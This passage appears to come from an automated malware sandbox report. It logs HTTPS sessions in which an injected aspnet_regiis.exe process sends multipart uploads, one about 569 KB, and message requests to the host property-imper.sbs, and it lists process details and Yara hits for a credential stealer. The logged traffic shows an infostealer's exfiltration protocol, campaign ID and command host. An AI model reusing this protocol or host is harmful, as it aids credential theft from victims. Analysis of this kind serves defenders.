2024-11-23 02:11:17 UTC	5211	OUT	Data Raw: 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: F3Wun 4F([:7s~X`nO`i
2024-11-23 02:11:18 UTC	1017	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 02:11:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ksigvdc7ci40bg4v73v6c0lga9; expires=Tue, 18-Mar-2025 19:57:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rvTud9yAm5MMIfR%2FyuXHeihkvXoFd1f06c3OJM6iLZOCqLVKwVUG403FqlnLd3AZykT5g5TvE4%2FN1h4MORr2RfTwCmGWJpqdML0P9G6vDwttfLg%2BIveQtxSwxAMGMrxGdjFPxLg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6da0b23969c3f3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1692&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21501&delivery_rate=1612368&cwnd=187&unsent_bytes=0&cid=159ed78111721112&ts=950&x=0"
2024-11-23 02:11:18 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 02:11:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49717	104.21.33.116	443	768	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 02:11:19 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GDLAT1QLDBQUDJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1239 Host: property-imper.sbs
2024-11-23 02:11:19 UTC	1239	OUT	Data Raw: 2d 2d 47 44 4c 41 54 31 51 4c 44 42 51 55 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 31 35 41 43 33 44 30 38 38 43 37 35 44 34 31 39 34 38 43 35 30 36 44 43 38 31 31 37 37 37 0d 0a 2d 2d 47 44 4c 41 54 31 51 4c 44 42 51 55 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 44 4c 41 54 31 51 4c 44 42 51 55 44 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 62 65 6e 7a 6f 79 6f 6c 6f 0d 0a 2d 2d 47 44 4c Data Ascii: --GDLAT1QLDBQUDJContent-Disposition: form-data; name="hwid"D715AC3D088C75D41948C506DC811777--GDLAT1QLDBQUDJContent-Disposition: form-data; name="pid"1--GDLAT1QLDBQUDJContent-Disposition: form-data; name="lid"BVnUqo--@benzoyolo--GDL
2024-11-23 02:11:20 UTC	1014	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 02:11:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m77nq0laqfst8i63s3eq1pi9bv; expires=Tue, 18-Mar-2025 19:57:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KlcAX%2FbVTdGqPCMxBoF0eXgIcLMvfSj8snwLxIwlQbEMY7itZGBW5v%2F8VfZ9rvuYCESDCP6CTT8WaH3TvzTlhLN0Oj9MsUOMfZO3bup3ctEsxQa7vpxwNcPa03%2FCJawXBxS9yOs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6da0c1eaf380d0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1736&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2154&delivery_rate=1635854&cwnd=208&unsent_bytes=0&cid=ae22c43187293182&ts=756&x=0"
2024-11-23 02:11:20 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 02:11:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49718	104.21.33.116	443	768	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 02:11:22 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=C5R9OIAZWH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 569082 Host: property-imper.sbs
2024-11-23 02:11:22 UTC	15331	OUT	Data Raw: 2d 2d 43 35 52 39 4f 49 41 5a 57 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 37 31 35 41 43 33 44 30 38 38 43 37 35 44 34 31 39 34 38 43 35 30 36 44 43 38 31 31 37 37 37 0d 0a 2d 2d 43 35 52 39 4f 49 41 5a 57 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 35 52 39 4f 49 41 5a 57 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 62 65 6e 7a 6f 79 6f 6c 6f 0d 0a 2d 2d 43 35 52 39 4f 49 41 5a 57 48 0d 0a 43 6f 6e Data Ascii: --C5R9OIAZWHContent-Disposition: form-data; name="hwid"D715AC3D088C75D41948C506DC811777--C5R9OIAZWHContent-Disposition: form-data; name="pid"1--C5R9OIAZWHContent-Disposition: form-data; name="lid"BVnUqo--@benzoyolo--C5R9OIAZWHCon
2024-11-23 02:11:22 UTC	15331	OUT	Data Raw: 06 d2 7e 80 d7 ca ed b5 c6 ad 4b 71 5f f8 ce 04 98 3f 52 4c 94 dd fa 29 4b 7e ea 2b 7b 6d c7 e3 c2 2d ad be b0 57 fe 02 bf 75 25 93 7a be 09 a3 0c cd 47 6b 08 8b a5 52 e3 b2 12 25 e9 56 ae d0 c5 34 c9 84 b5 ec 85 f1 79 21 0d a7 96 a5 8e 5a 91 1c e5 29 7d 21 ca fd 7a 58 42 52 72 3b 53 39 06 16 4a f6 65 1a de 38 21 0d 26 e4 60 fd 70 7a a6 e0 5a 19 1f ec b3 55 e9 e5 e0 c7 6b 1d 54 04 df b0 6b 1a f6 f0 37 3e ae 1c 32 d6 8e 0a ae 05 90 d0 5d ba f0 d6 aa 89 24 7a 0e bb f6 3d 6f dd ad 45 89 b5 9b 1f ac 5e 58 d3 e8 85 68 79 b2 37 60 db ea a2 62 be 03 c1 8d 02 e3 27 17 0e bc eb d2 04 15 63 a9 0f 5f 7f 59 3f e6 f4 c0 9e eb 67 f3 da 3f 1b 62 cf f5 5c 98 7d f6 fe 02 92 40 c7 ff ac 81 bc 6f ba 0d ec 1a af aa aa 41 31 1d 9b 8f e8 50 e8 39 f2 f0 e5 a4 bc 8e ca d0 db 50 Data Ascii: ~Kq_?RL)K~+{m-Wu%zGkR%V4y!Z)}!zXBRr;S9Je8!&`pzZUkTk7>2]$z=oE^Xhy7`b'c_Y?g?b\}@oA1P9P
2024-11-23 02:11:22 UTC	15331	OUT	Data Raw: 42 0a ec df 4f 51 14 a3 ac f1 81 23 7b d5 eb 83 f3 6f 29 77 89 0a ed c2 3c bf 9f 34 cf d2 1c 3e 2e 6d ee 9f 56 b2 f5 fb bf 42 6e e7 62 8c 72 6a e8 d0 cf f7 91 9c c2 a7 93 55 ef df 4a 05 08 79 72 d2 ab 6f d1 8d 2a 52 39 de 7d 61 b7 1f cd c9 0d 5c c9 a8 8e 19 9f b6 fb 22 c2 f1 4a 08 26 76 d1 c7 0e 85 24 a4 85 2b bb a2 c5 86 34 86 9a 7b f2 ca b0 12 e4 8d b5 5c 66 85 ad 5d be a7 d8 2f 15 6a 55 33 25 0d ad 03 eb fe 7b 7d 0f 26 4a 3f 49 c3 a1 6c dd 47 98 a6 a2 95 93 6f 25 17 c5 cf ef d2 5a 93 bc 94 48 3e 35 9c 37 5f 13 ca ad 50 e1 d0 0a 62 22 8c 52 dc 97 1f 59 50 4b b1 93 d2 f5 1e c6 a6 71 7b 1f 26 b4 87 ba 29 37 c5 92 90 0a 93 df 4c 02 3c 9c a4 0c 2f 5f d1 9b fe 25 31 f9 51 7b 93 5c 39 f9 f2 c9 37 b9 1b 15 1a 9b 8f 18 eb dd cb 3c dc 2f 3e e9 6c b0 f0 4b 7f 6b Data Ascii: BOQ#{o)w<4>.mVBnbrjUJyro*R9}a\"J&v$+4{\f]/jU3%{}&J?IlGo%ZH>57_Pb"RYPKq{&)7L</_%1Q{\97</>lKk
2024-11-23 02:11:22 UTC	15331	OUT	Data Raw: 16 f9 81 23 aa 16 44 d6 1f ef cf 56 07 0c bf 1c 7a ff 20 f3 76 81 69 41 9e 6d 72 9b 18 56 05 04 47 5c bb 6c 66 5e 38 57 94 ef b5 45 9f c5 68 c5 6b 86 37 c5 5a 43 70 d7 42 1e 73 77 70 46 8a dd 80 2a ab d3 52 42 18 f3 1b 8b 7f 98 89 22 73 4d c5 05 d5 87 55 af 7e 4b a4 ca 83 fd 18 27 28 a3 0a 52 d3 c2 cc df 36 f7 5f 7b d5 8d 28 dc b4 b8 0f 61 cf 0d 04 d8 53 3e a4 de 6c 3b b2 74 8c c8 f5 bb 6d c6 a8 2f 10 f3 94 c6 c2 9f 48 f7 cf cf 8a c3 c2 12 fc d6 b8 2e 6e 1c c8 a3 55 f5 8b 39 33 fd 43 64 a4 c0 64 e8 26 97 ab 62 fb eb ff 19 1e 7a 0b d3 66 ba 18 bd 01 4c 51 c2 37 74 c5 9f fe 6f 71 fb f6 9f 80 be e7 7e 4b 6e 49 f5 9e a9 4d e6 b9 2d ed 6f ef 12 de ae d2 0e 06 e7 44 e2 b9 eb a6 99 47 c4 f6 70 dd d4 f9 95 bd 5f c1 3d c6 0a 29 7c ff 00 77 b5 75 4e 7e 35 52 9c e7 Data Ascii: #DVz viAmrVG\lf^8WEhk7ZCpBswpF*RB"sMU~K'(R6_{(aS>l;tm/H.nU93Cdd&bzfLQ7toq~KnIM-oDGp_=)\|wuN~5R
2024-11-23 02:11:22 UTC	15331	OUT	Data Raw: ae 60 67 e2 81 bb 1b 84 cf 74 1d ce df f7 78 a3 e1 8c d6 92 fa 5c 49 b1 07 bf c0 9f 77 a4 4f 7e 47 1b a3 75 fd e7 1a ec 83 1e 49 25 09 8b fc de 9a a8 37 c1 f9 70 88 dc 74 63 cd 5c 4d d5 93 af 3b 68 ab e3 e5 1a bd b1 1d ae 78 fa e1 77 8a 25 7d dc b3 40 bc 75 ed ac a0 4d 9f 8a 5a 56 c6 f0 26 10 55 d1 b1 d2 ef 70 04 2f 6c d2 d9 27 0c 37 0f 8a 07 09 5c da ef 74 5e 98 bc e4 ca 3a bc 73 9d 08 fe 2a 78 a8 76 c3 41 23 19 41 02 bb 88 5f 4d 71 c4 cc aa b5 52 62 9c 6f 5d a0 e8 c4 29 ba 65 2b e6 f9 b1 b6 6f 12 d2 4c eb 0e d5 f8 d1 2d 4d 4f 0d 39 d4 64 2f 6d a2 2a b6 05 c7 64 75 3f 72 94 eb 57 97 15 d9 61 d3 4c cc 54 4e a5 b5 be 79 d8 14 61 d4 6d ef 09 4e 83 dc dd 75 0e ba 89 fd b6 59 0a bd 51 81 9c 3f 0d 62 26 52 0e ce e1 61 0c bf 39 4e a9 bd 26 03 36 0b 12 94 54 a9 Data Ascii: `gtx\IwO~GuI%7ptc\M;hxw%}@uMZV&Up/l'7\t^:sxvA#A_MqRbo])e+oL-MO9d/mdu?rWaLTNyamNuYQ?b&Ra9N&6T
2024-11-23 02:11:22 UTC	15331	OUT	Data Raw: b7 ff 88 79 e1 0d 68 c8 c1 50 d5 c6 e5 0b 81 0f 22 a8 2a 06 d3 83 9f cf 4d 34 d6 9d bd ec 00 48 0e c1 11 a1 eb 47 c6 b3 e8 09 0d e4 29 c1 56 fc 3b 09 1a 52 d3 7d b9 f3 4f 13 1b cd 3e 31 e4 c8 c3 93 b6 63 8a fd 1d 4f 43 8f 5e 33 bb c2 dd 31 ad cc 08 2f 7e f7 24 9e 82 8d c0 c4 ac 9b 38 2b b9 d4 45 84 74 ef b9 57 24 b8 ed ae 7b 02 7c ec b0 91 5e 81 e6 08 66 24 c0 77 fa 0c 3e a6 dd a9 62 c3 47 90 d4 17 9e ac 8d 3c 5b 25 29 b7 31 ee 5e 9d 3c 0d 33 a3 e1 31 00 6e 8e 2a 66 28 a6 0d 12 92 39 f7 a3 8b fe 37 3d d4 0c 84 ac 77 c8 d2 96 9f 20 89 8c bf 8c 5b aa 16 13 a9 0f d3 44 3d cf ad be 72 b3 44 1c 38 70 e4 07 a5 72 e8 07 45 04 b0 96 a5 c0 bf fc ac 8e 7f f8 fd f7 01 4a 5b ef 79 e0 46 4f 0b a7 09 30 3e a4 15 22 ca fe 39 60 be 7e 9e 20 08 ca e6 92 5b 44 25 a9 92 3b Data Ascii: yhP"M4HG)V;R}O>1cOC^31/~$8+EtW${\|^f$w>bG<[%)1^<31nf(97=w [D=rD8prEJ[yFO0>"9`~ [D%;
2024-11-23 02:11:22 UTC	15331	OUT	Data Raw: 6a b4 4f 6d 2c 2c 4e 6c 7a 4f 70 16 39 3f 96 df ab 9e 8d 3a 77 fc 40 14 4d 49 bc da 8c 42 4f 34 b4 71 c5 88 b0 ff 1e c0 68 73 64 ef 62 dd 8d 3a 67 9f e8 73 d5 f4 7c 8e 0f 34 be f5 f3 b2 96 8d 30 3f 5a 2d a3 c2 03 e4 36 d9 c3 c7 ca a2 37 ac 07 15 cf 07 46 f8 0b ce 7e 91 c1 f2 df 3b 85 ed dc b7 97 91 a8 da 84 32 1d c3 dc 1b f8 22 3e 10 ce 57 98 1a 72 ae 6a 6e 16 cb b9 52 ab 39 06 2e a4 2d 72 8a d9 e8 31 5e a1 99 7b 14 5f 7c 8d 80 95 25 69 90 34 86 45 11 77 26 7a 79 8e ca b9 12 4e 1f 3b 37 48 51 54 22 51 14 33 14 db 93 6b 35 3f 6f 13 9c 3e 4b b3 b5 89 71 dd a5 32 6e f3 ed ab 9b d6 4f 53 3d 21 e2 94 da 4a 21 25 b1 91 bd b3 ca 45 36 74 cd e4 30 c5 47 90 54 ad 00 51 dd 66 91 32 6c 72 2e 8b d1 b9 4b 18 1b cf 75 4c 2d fe f1 26 64 e8 c7 3d 99 a9 ae 3f 44 59 d9 d3 Data Ascii: jOm,,NlzOp9?:w@MIBO4qhsdb:gs\|40?Z-67F~;2">WrjnR9.-r1^{_\|%i4Ew&zyN;7HQT"Q3k5?o>Kq2nOS=!J!%E6t0GTQf2lr.KuL-&d=?DY
2024-11-23 02:11:22 UTC	15331	OUT	Data Raw: c0 c4 35 64 13 06 c8 b3 9f de e7 39 79 55 a8 04 15 ce 9d 37 61 25 78 5e f8 f7 04 08 7d 76 76 7c 92 87 0e 7e 84 16 2c 69 21 ea 89 51 ff 3e 83 d2 c1 8e c7 9d 6a 2d 11 80 67 0f 46 e9 a5 14 aa 3f dd 6e 63 9f ed 1e e3 dd 47 ab d8 14 a8 39 95 88 11 7b 34 f2 fd f6 9a 9d b8 8d 2c 27 e9 13 c0 8f 94 d0 7f 0e 8a f7 21 32 d3 e2 15 fe b9 9f f4 f7 f7 44 e7 c0 13 e0 73 f6 73 ed 23 f3 b6 36 fa 9c c9 ba 79 9d e3 7b e8 3c a0 62 ab 1a fe f6 61 28 ef f1 09 27 29 1d ad bf 56 88 0d df 53 98 4c be 55 4f b6 fd 17 ca 79 d6 0e 37 65 21 eb 8a 42 5e 64 88 c6 bd fb 7d 4b 7f e9 ad 80 77 e9 e9 aa 81 09 9a 1e dd 09 b6 02 9f 73 fc d8 31 68 71 2c 0a 35 4f dd b1 d9 1a 8b b9 92 86 b9 de cc 70 08 75 16 bc 79 60 cb 65 64 ec 58 22 97 85 38 cf 1f b7 30 be c9 15 5b 83 ee 35 ec 64 c4 f1 70 c9 d5 Data Ascii: 5d9yU7a%x^}vv\|~,i!Q>j-gF?ncG9{4,'!2Dss#6y{<ba(')VSLUOy7e!B^d}Kws1hq,5Opuy`edX"80[5dp
2024-11-23 02:11:22 UTC	15331	OUT	Data Raw: 2c 24 aa 41 99 aa 2e a8 ee bb f2 01 69 65 47 be 82 7d 93 a7 f6 4e 78 d0 5a d1 56 91 d5 cc bb db a9 ba 78 6b 32 df a1 d1 4f 2e 54 97 6a 58 be 89 a5 fb f1 97 c2 36 74 34 4d 46 45 2c fa bc f3 cb 8d 8c 02 e4 0c 5f 61 01 4a 1c 13 1b a1 80 e0 74 ce 64 c0 d4 09 ef cd 19 7d f8 9b 36 e1 b4 b4 1e f6 c2 1c 58 64 c8 d2 64 e0 54 34 02 2f 81 3c 28 8c 62 38 37 24 c4 c7 b9 a1 28 e1 41 49 bc 99 e7 89 bc eb da 23 82 05 1c fc 35 53 65 be 5a dd 49 ce cd 53 72 57 3e 60 52 af f1 80 b1 ab 2e 1c 21 84 89 d3 3d 38 d8 ef b0 a6 35 a5 e7 64 9d 56 77 43 55 6b 52 8d da 98 92 7c 4b 95 e9 3f 04 92 9a 7c 66 10 85 3d c5 45 36 03 c1 77 4f f6 be 88 e8 e5 72 f2 11 57 ba 71 46 13 e5 75 ef 7f 6b c0 ff 6c 76 cb 3f 80 17 6f 96 94 66 ed aa 4a 19 d0 36 74 7d fd a1 d5 11 9c ed ab 12 95 8f ba 3d 1c Data Ascii: ,$A.ieG}NxZVxk2O.TjX6t4MFE,_aJtd}6XddT4/<(b87$(AI#5SeZISrW>`R.!=85dVwCUkR\|K?\|f=E6wOrWqFuklv?ofJ6t}=
2024-11-23 02:11:22 UTC	15331	OUT	Data Raw: 51 a2 7c 4a 80 8f bf be 34 c1 d4 a0 81 6c 7e 2e 50 db c4 48 4a 88 b7 fb 11 f1 12 78 44 92 94 f9 a5 88 14 c7 41 ac 98 d4 24 d4 0f 67 ed bd 71 ad f8 94 36 a8 f3 0a c5 7b e3 83 3b aa b7 8d fb ed 2f 41 4a dc 42 15 09 69 a2 8d 01 bf cf 10 4e 40 48 70 4c 3e 7b 59 90 06 cf 91 93 0f 35 88 87 72 6a ec c3 43 fa dc a9 5c f3 e9 73 96 4f 09 c2 e0 be a5 dc 1e e5 03 70 06 16 bd 73 87 2f 71 d1 28 59 5c ac fb 06 db 51 7c fa c8 53 60 8a f2 9b dd 2e b8 8e d2 36 d1 3b 99 b2 77 8d 8d dd cb 8d b8 22 fa a6 00 88 f0 3c 7a 19 86 60 93 de c2 a6 07 70 6f 7f 2e 5d 32 e0 2e 21 1e 5d cd 3a 67 54 47 38 12 c3 93 55 d1 6e 16 32 83 68 10 f2 30 32 31 7e 2d d8 91 7c e8 3b 55 62 e2 40 c3 af 62 e2 b5 2c 0d ab d1 b4 bb 72 ef b1 8c e3 3f 5b b0 79 55 2e 0e a1 37 8f 3a 11 60 f0 7f 42 a0 75 55 f0 Data Ascii: Q\|J4l~.PHJxDA$gq6{;/AJBiN@HpL>{Y5rjC\sOps/q(Y\Q\|S`.6;w"<z`po.]2.!]:gTG8Un2h021~-\|;Ub@b,r?[yU.7:`BuU
2024-11-23 02:11:24 UTC	1025	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 02:11:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=201mdg6q6tbpil0brompc27tj4; expires=Tue, 18-Mar-2025 19:58:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FgfX8X2fQ2j%2Fdj%2FUmaFp8CnluO%2BbZoNhVbYExp8f6gQsSV0VPD4KuSWDvK9SvdQygRJIEg2sqJvbgR0k%2BT3xOC26ijiegwsIG%2BfnwDLuPp7AMakmMUq9Nix5Sk7q29XzykglQtw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6da0d0fb425e78-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1581&sent=333&recv=594&lost=0&retrans=0&sent_bytes=2845&recv_bytes=571623&delivery_rate=1787025&cwnd=252&unsent_bytes=0&cid=4d48a8f3f28eb4e8&ts=2752&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49732	104.21.33.116	443	768	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 02:11:26 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: property-imper.sbs
2024-11-23 02:11:26 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 62 65 6e 7a 6f 79 6f 6c 6f 26 6a 3d 26 68 77 69 64 3d 44 37 31 35 41 43 33 44 30 38 38 43 37 35 44 34 31 39 34 38 43 35 30 36 44 43 38 31 31 37 37 37 Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@benzoyolo&j=&hwid=D715AC3D088C75D41948C506DC811777
2024-11-23 02:11:26 UTC	1016	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 02:11:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ib148sgdniqsrqphcjaskhl9l5; expires=Tue, 18-Mar-2025 19:58:05 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xQrtJkJvOw4E1DqmJ1m6wej%2BQzLEZzrNy5mbrSBwITQEkA%2BZMuJ8%2FohnT0kwlzz1DQwOXk2r31Lzha24qvjjELOo0qxeZzUuLvXY4nJ%2BZ9Ttl5e2gJsxoWev8P5c49yGOgOHvQs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6da0eadb1e447a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14298&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=989&delivery_rate=1634023&cwnd=219&unsent_bytes=0&cid=b31a13681fcc73e3&ts=740&x=0"
2024-11-23 02:11:26 UTC	126	IN	Data Raw: 37 38 0d 0a 68 36 48 59 31 52 52 4b 6c 6f 50 77 67 2f 46 6d 4f 72 64 64 33 2f 43 45 34 43 70 6c 74 30 73 53 79 55 41 47 45 57 4a 70 6b 35 62 63 32 76 71 67 4e 6e 43 30 36 34 54 33 67 56 78 6d 6d 41 48 77 77 62 44 58 42 46 47 43 5a 53 62 2b 62 6a 34 67 50 6b 62 77 2b 65 6e 4a 74 36 5a 67 5a 50 50 37 6c 61 48 64 52 46 7a 44 66 2b 58 41 71 4d 4a 50 52 34 31 37 62 35 51 3d 0d 0a Data Ascii: 78h6HY1RRKloPwg/FmOrdd3/CE4Cplt0sSyUAGEWJpk5bc2vqgNnC064T3gVxmmAHwwbDXBFGCZSb+bj4gPkbw+enJt6ZgZPP7laHdRFzDf+XAqMJPR417b5Q=
2024-11-23 02:11:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	21:11:04
Start date:	22/11/2024
Path:	C:\Users\user\Desktop\Script.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Script.exe"
Imagebase:	0x9a0000
File size:	709'632 bytes
MD5 hash:	E9C36F6A03694C88081409D38D76B9E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	21:11:04
Start date:	22/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:11:05
Start date:	22/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x9d0000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2214373366.0000000002EA6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2165564046.0000000002E80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2187249124.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2186969627.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2211804486.0000000002E81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2214338243.0000000002E9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2164774732.0000000002E7F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	21:11:05
Start date:	22/11/2024
